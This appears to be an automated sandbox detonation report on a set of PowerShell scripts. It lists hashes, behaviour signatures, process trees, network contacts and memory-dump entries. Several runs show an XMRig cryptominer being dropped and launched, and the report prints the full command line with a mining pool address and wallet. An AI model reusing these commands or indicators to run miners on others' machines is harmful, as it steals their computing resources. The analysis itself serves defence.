C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2conkjh.d2u.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/588-25-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp
memory/588-48-0x00000223D73B0000-0x00000223D73C2000-memory.dmp
memory/588-61-0x00000223D73A0000-0x00000223D73AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3440,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2012-0-0x00007FFDA3233000-0x00007FFDA3235000-memory.dmp
memory/2012-1-0x000002125ACF0000-0x000002125AD12000-memory.dmp
memory/2012-7-0x00007FFDA3230000-0x00007FFDA3CF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4h3lwc5.au2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:42
Platform
win11-20240508-en
Max time kernel
1673s
Max time network
1684s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4656-0-0x00007FFD8D1F3000-0x00007FFD8D1F5000-memory.dmp
memory/4656-9-0x00000225BD400000-0x00000225BD422000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hamumf1.jgs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4604 wrote to memory of 1600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4604 wrote to memory of 1600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 20.231.121.79:80 | N/A | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah0edcim.mus.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4604-25-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/4604-48-0x000002031FAB0000-0x000002031FAC2000-memory.dmp
memory/4604-61-0x000002031F910000-0x000002031F91A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:45
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1748,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| NL | 52.142.223.178:80 | | tcp |
Files
memory/224-0-0x00007FFFE5003000-0x00007FFFE5005000-memory.dmp
memory/224-10-0x000001EA2E830000-0x000001EA2E852000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40qnqvo4.kv5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/224-11-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-12-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-13-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-14-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-15-0x00007FFFE5003000-0x00007FFFE5005000-memory.dmp
memory/224-16-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-17-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win10v2004-20240508-en
Max time kernel
1554s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4588-0-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xj44tu10.l4x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4588-10-0x000001DB720C0000-0x000001DB720E2000-memory.dmp
memory/4588-11-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-12-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-13-0x000001DB72260000-0x000001DB7247C000-memory.dmp
memory/4588-14-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-15-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-16-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-18-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
memory/4588-20-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:18
Platform
win10-20240404-en
Max time kernel
1793s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1468 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1468 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/1468-3-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/1468-5-0x0000020A48A40000-0x0000020A48A62000-memory.dmp
memory/1468-6-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-9-0x0000020A48D10000-0x0000020A48D86000-memory.dmp
memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhgguzv4.5ar.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-48-0x0000020A48AE0000-0x0000020A48AF2000-memory.dmp
memory/1468-61-0x0000020A48AD0000-0x0000020A48ADA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4016-90-0x000002825D4B0000-0x000002825D4D0000-memory.dmp
memory/4016-91-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/1468-92-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-94-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/4016-93-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/1468-95-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-96-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4016-97-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-98-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-99-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-100-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-101-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-102-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-103-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-104-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-105-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-106-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-107-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-108-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-109-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-110-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-111-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-112-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-113-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-114-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-115-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-116-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-117-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-118-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-119-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-120-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-121-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-122-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-123-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-124-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-125-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-126-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-127-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-128-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-129-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-130-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-131-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-132-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-133-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-134-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-135-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-136-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-137-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-138-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-139-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-140-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-141-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-142-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-143-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-144-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-145-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-146-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-147-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-148-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-149-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-150-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-151-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-152-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-153-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-154-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-155-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-156-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-157-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:23
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
